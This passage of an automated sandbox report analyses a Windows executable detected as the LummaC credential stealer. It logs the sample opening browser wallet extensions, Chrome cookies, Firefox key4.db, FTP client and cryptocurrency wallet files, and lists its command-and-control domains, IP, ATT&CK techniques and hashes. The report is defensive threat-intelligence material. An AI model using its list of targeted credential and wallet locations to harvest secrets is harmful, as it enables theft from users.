          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Process Injection          		34
          Virtualization/Sandbox Evasion          		2
          OS Credential Dumping          		751
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Process Injection          		LSASS Memory34
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol41
          Data from Local System          		2
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive113
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Software Packing          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets223
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://frogs-severz.sbs/apial100%Avira URL Cloudmalware
          https://frogs-severz.sbs/api=100%Avira URL Cloudmalware
          https://contile-images.services.mozilla.com/obgoOYObjIFea_b0%Avira URL Cloudsafe
          https://frogs-severz.sbs/apiz100%Avira URL Cloudmalware
          https://frogs-severz.sbs/4R100%Avira URL Cloudmalware
          https://frogs-severz.sbs/apisi100%Avira URL Cloudmalware
          https://frogs-severz.sbs:443/api100%Avira URL Cloudmalware
          https://frogs-severz.sbs/apig100%Avira URL Cloudmalware
          https://frogs-severz.sbs/api)100%Avira URL Cloudmalware
          https://frogs-severz.sbs/TR100%Avira URL Cloudmalware
          https://frogs-severz.sbs/apii100%Avira URL Cloudmalware
          https://frogs-severz.sbs/apiX100%Avira URL Cloudmalware
          https://frogs-severz.sbs/apia100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          frogs-severz.sbs
          		104.21.88.250
          		truefalse
            		high
            property-imper.sbs
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://frogs-severz.sbs/apifalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bfile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600188579.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://frogs-severz.sbs/4Rfile.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://frogs-severz.sbs/apialfile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600238733.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://frogs-severz.sbs/api=file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://frogs-severz.sbs/apizfile.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://frogs-severz.sbs:443/apifile.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://frogs-severz.sbs/apisifile.exe, 00000000.00000003.1545581901.000000000109C000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://frogs-severz.sbs/apigfile.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://frogs-severz.sbs/file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://frogs-severz.sbs/api)file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://frogs-severz.sbs/apiifile.exe, 00000000.00000002.1602996314.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://frogs-severz.sbs/TRfile.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctafile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://frogs-severz.sbs/apiXfile.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://frogs-severz.sbs/apiafile.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.88.250
                                                              		frogs-severz.sbsUnited States
                                                              		13335CLOUDFLARENETUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1562133
                                                              Start date and time:2024-11-25 08:43:12 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 4m 30s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Stop behavior analysis, all processes terminated

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: file.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              02:44:16API Interceptor9x Sleep call for process: file.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.21.88.250file.exeGet hashmaliciousUnknownBrowse
                                                                injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                  SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                    b.exeGet hashmaliciousLummaC StealerBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      frogs-severz.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      b.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 193.143.1.19

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://linktr.ee/priyanka662Get hashmaliciousGabagoolBrowse
                                                                      • 172.67.74.152
                                                                      t90RvrDNvz.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.204.237
                                                                      segura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 172.67.187.200
                                                                      asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                      • 104.21.84.67
                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                      • 172.64.41.3
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.47
                                                                      2Brb1DnRS6.wsfGet hashmaliciousUnknownBrowse
                                                                      • 172.67.204.2
                                                                      pm4ozz83c4.vbsGet hashmaliciousUnknownBrowse
                                                                      • 172.67.204.2
                                                                      Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 172.67.191.199
                                                                      NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 172.67.177.134

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1t90RvrDNvz.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      docx008.docx.docGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      docx002.docx.docGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      docx009.docx.docGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      docx007.docx.docGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.88.250
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.88.250

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.947718222024007
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:1'844'224 bytes
                                                                      MD5:5032eea68452ff054956add942d03697
                                                                      SHA1:dc28bb50951074ec5d823e4bc94ba520796cc88f
                                                                      SHA256:940581abda4098f8858edda4080cff127a179db5c7ac9d6f357881569b703fdb
